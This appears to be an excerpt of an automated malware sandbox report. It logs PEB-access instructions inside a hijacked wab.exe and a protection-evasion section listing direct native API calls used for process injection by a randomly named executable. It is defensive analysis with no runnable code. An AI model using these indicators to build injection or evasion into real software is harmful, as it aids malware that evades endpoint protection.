Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0C00 mov eax, dword ptr fs:[00000030h] 10_2_1FDB0C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE71C3C mov eax, dword ptr fs:[00000030h] 10_2_1FE71C3C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCC00 mov eax, dword ptr fs:[00000030h] 10_2_1FDDCC00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE7BC01 mov eax, dword ptr fs:[00000030h] 10_2_1FE7BC01
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE7BC01 mov eax, dword ptr fs:[00000030h] 10_2_1FE7BC01
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBC3B mov esi, dword ptr fs:[00000030h] 10_2_1FDDBC3B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE24C0F mov eax, dword ptr fs:[00000030h] 10_2_1FE24C0F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9EC20 mov eax, dword ptr fs:[00000030h] 10_2_1FD9EC20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3BD6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3BD6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3BD6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3BD6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3BD6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97BCD mov eax, dword ptr fs:[00000030h] 10_2_1FD97BCD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97BCD mov ecx, dword ptr fs:[00000030h] 10_2_1FD97BCD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC0BCB mov eax, dword ptr fs:[00000030h] 10_2_1FDC0BCB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC0BCB mov eax, dword ptr fs:[00000030h] 10_2_1FDC0BCB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC0BCB mov eax, dword ptr fs:[00000030h] 10_2_1FDC0BCB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA0BCD mov eax, dword ptr fs:[00000030h] 10_2_1FDA0BCD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA0BCD mov eax, dword ptr fs:[00000030h] 10_2_1FDA0BCD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA0BCD mov eax, dword ptr fs:[00000030h] 10_2_1FDA0BCD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA9BC4 mov eax, dword ptr fs:[00000030h] 10_2_1FDA9BC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCEBFC mov eax, dword ptr fs:[00000030h] 10_2_1FDCEBFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8BF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8BF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8BF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE1BEF mov eax, dword ptr fs:[00000030h] 10_2_1FDE1BEF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE1BEF mov eax, dword ptr fs:[00000030h] 10_2_1FDE1BEF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4EBD0 mov eax, dword ptr fs:[00000030h] 10_2_1FE4EBD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2FBDC mov eax, dword ptr fs:[00000030h] 10_2_1FE2FBDC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2FBDC mov eax, dword ptr fs:[00000030h] 10_2_1FE2FBDC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2FBDC mov eax, dword ptr fs:[00000030h] 10_2_1FE2FBDC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD9B9F mov eax, dword ptr fs:[00000030h] 10_2_1FDD9B9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD9B9F mov eax, dword ptr fs:[00000030h] 10_2_1FDD9B9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD9B9F mov eax, dword ptr fs:[00000030h] 10_2_1FDD9B9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0BBE mov eax, dword ptr fs:[00000030h] 10_2_1FDB0BBE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0BBE mov eax, dword ptr fs:[00000030h] 10_2_1FDB0BBE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE69B8B mov eax, dword ptr fs:[00000030h] 10_2_1FE69B8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE69B8B mov eax, dword ptr fs:[00000030h] 10_2_1FE69B8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FB97 mov eax, dword ptr fs:[00000030h] 10_2_1FE5FB97
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDBA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDBA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDBA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDBA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDBA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDBA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9FB4C mov edi, dword ptr fs:[00000030h] 10_2_1FD9FB4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6AB40 mov eax, dword ptr fs:[00000030h] 10_2_1FE6AB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE48B42 mov eax, dword ptr fs:[00000030h] 10_2_1FE48B42
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9CB7E mov eax, dword ptr fs:[00000030h] 10_2_1FD9CB7E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE68B28 mov eax, dword ptr fs:[00000030h] 10_2_1FE68B28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE68B28 mov eax, dword ptr fs:[00000030h] 10_2_1FE68B28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDB00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDB00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDB00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDB00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDB00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDB00 mov edx, dword ptr fs:[00000030h] 10_2_1FDCDB00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA1B04 mov eax, dword ptr fs:[00000030h] 10_2_1FDA1B04
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA1B04 mov eax, dword ptr fs:[00000030h] 10_2_1FDA1B04
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FB0C mov eax, dword ptr fs:[00000030h] 10_2_1FE5FB0C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD9B28 mov eax, dword ptr fs:[00000030h] 10_2_1FDD9B28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD9B28 mov eax, dword ptr fs:[00000030h] 10_2_1FDD9B28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1EB1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCEB20 mov eax, dword ptr fs:[00000030h] 10_2_1FDCEB20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCEB20 mov eax, dword ptr fs:[00000030h] 10_2_1FDCEB20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCBADA mov eax, dword ptr fs:[00000030h] 10_2_1FDCBADA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA0AD0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA0AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD4AD0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD4AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD4AD0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD4AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDF6ACC mov eax, dword ptr fs:[00000030h] 10_2_1FDF6ACC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDF6ACC mov eax, dword ptr fs:[00000030h] 10_2_1FDF6ACC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDF6ACC mov eax, dword ptr fs:[00000030h] 10_2_1FDF6ACC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE21ACB mov eax, dword ptr fs:[00000030h] 10_2_1FE21ACB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE21ACB mov ecx, dword ptr fs:[00000030h] 10_2_1FE21ACB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDAAEE mov eax, dword ptr fs:[00000030h] 10_2_1FDDAAEE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDAAEE mov eax, dword ptr fs:[00000030h] 10_2_1FDDAAEE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9BAE0 mov eax, dword ptr fs:[00000030h] 10_2_1FD9BAE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4DAAC mov ecx, dword ptr fs:[00000030h] 10_2_1FE4DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4DAAC mov ecx, dword ptr fs:[00000030h] 10_2_1FE4DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4DAAC mov eax, dword ptr fs:[00000030h] 10_2_1FE4DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD8A90 mov edx, dword ptr fs:[00000030h] 10_2_1FDD8A90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97A80 mov eax, dword ptr fs:[00000030h] 10_2_1FD97A80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97A80 mov eax, dword ptr fs:[00000030h] 10_2_1FD97A80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97A80 mov eax, dword ptr fs:[00000030h] 10_2_1FD97A80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAEA80 mov eax, dword ptr fs:[00000030h] 10_2_1FDAEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FA87 mov eax, dword ptr fs:[00000030h] 10_2_1FE5FA87
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE74A80 mov eax, dword ptr fs:[00000030h] 10_2_1FE74A80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDAAE mov eax, dword ptr fs:[00000030h] 10_2_1FDCDAAE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABAA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDABAA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABAA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDABAA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8AA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8AA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDF6AA4 mov eax, dword ptr fs:[00000030h] 10_2_1FDF6AA4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9FAA4 mov ecx, dword ptr fs:[00000030h] 10_2_1FD9FAA4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0A5B mov eax, dword ptr fs:[00000030h] 10_2_1FDB0A5B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0A5B mov eax, dword ptr fs:[00000030h] 10_2_1FDB0A5B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6A50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6A50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1CA72 mov eax, dword ptr fs:[00000030h] 10_2_1FE1CA72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1CA72 mov eax, dword ptr fs:[00000030h] 10_2_1FE1CA72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD99A40 mov ecx, dword ptr fs:[00000030h] 10_2_1FD99A40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h] 10_2_1FE33A78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h] 10_2_1FE33A78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h] 10_2_1FE33A78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h] 10_2_1FE33A78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h] 10_2_1FE33A78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE33A78 mov eax, dword ptr fs:[00000030h] 10_2_1FE33A78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCA6F mov eax, dword ptr fs:[00000030h] 10_2_1FDDCA6F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCA6F mov eax, dword ptr fs:[00000030h] 10_2_1FDDCA6F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCA6F mov eax, dword ptr fs:[00000030h] 10_2_1FDDCA6F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC9A18 mov ecx, dword ptr fs:[00000030h] 10_2_1FDC9A18
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9BA10 mov eax, dword ptr fs:[00000030h] 10_2_1FD9BA10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD5A01 mov eax, dword ptr fs:[00000030h] 10_2_1FDD5A01
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD5A01 mov ecx, dword ptr fs:[00000030h] 10_2_1FDD5A01
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD5A01 mov eax, dword ptr fs:[00000030h] 10_2_1FDD5A01
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD5A01 mov eax, dword ptr fs:[00000030h] 10_2_1FDD5A01
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCA38 mov eax, dword ptr fs:[00000030h] 10_2_1FDDCA38
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FA02 mov eax, dword ptr fs:[00000030h] 10_2_1FE5FA02
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC4A35 mov eax, dword ptr fs:[00000030h] 10_2_1FDC4A35
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC4A35 mov eax, dword ptr fs:[00000030h] 10_2_1FDC4A35
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h] 10_2_1FDABA30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABA30 mov ecx, dword ptr fs:[00000030h] 10_2_1FDABA30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h] 10_2_1FDABA30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h] 10_2_1FDABA30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h] 10_2_1FDABA30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABA30 mov eax, dword ptr fs:[00000030h] 10_2_1FDABA30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCEA2E mov eax, dword ptr fs:[00000030h] 10_2_1FDCEA2E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2CA11 mov eax, dword ptr fs:[00000030h] 10_2_1FE2CA11
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE47A11 mov edi, dword ptr fs:[00000030h] 10_2_1FE47A11
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCA24 mov eax, dword ptr fs:[00000030h] 10_2_1FDDCA24
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDA20 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDA20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCDA20 mov eax, dword ptr fs:[00000030h] 10_2_1FDCDA20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1DA1D mov eax, dword ptr fs:[00000030h] 10_2_1FE1DA1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAA9D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAA9D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAA9D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAA9D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAA9D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAA9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAA9D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCD9D0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCD9D0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtResumeThread: Direct from: 0x773836AC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtMapViewOfSection: Direct from: 0x77382D1C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtWriteVirtualMemory: Direct from: 0x77382E3C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtProtectVirtualMemory: Direct from: 0x77382F9C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtSetInformationThread: Direct from: 0x773763F9 Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtCreateMutant: Direct from: 0x773835CC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtNotifyChangeKey: Direct from: 0x77383C2C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtSetInformationProcess: Direct from: 0x77382C5C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtCreateUserProcess: Direct from: 0x7738371C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQueryInformationProcess: Direct from: 0x77382C26 Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtResumeThread: Direct from: 0x77382FBC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtWriteVirtualMemory: Direct from: 0x7738490C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtOpenKeyEx: Direct from: 0x77383C9C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtReadFile: Direct from: 0x77382ADC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtDelayExecution: Direct from: 0x77382DDC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQuerySystemInformation: Direct from: 0x77382DFC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtOpenSection: Direct from: 0x77382E0C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQuerySystemInformation: Direct from: 0x773848CC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtReadVirtualMemory: Direct from: 0x77382E8C Jump to behavior
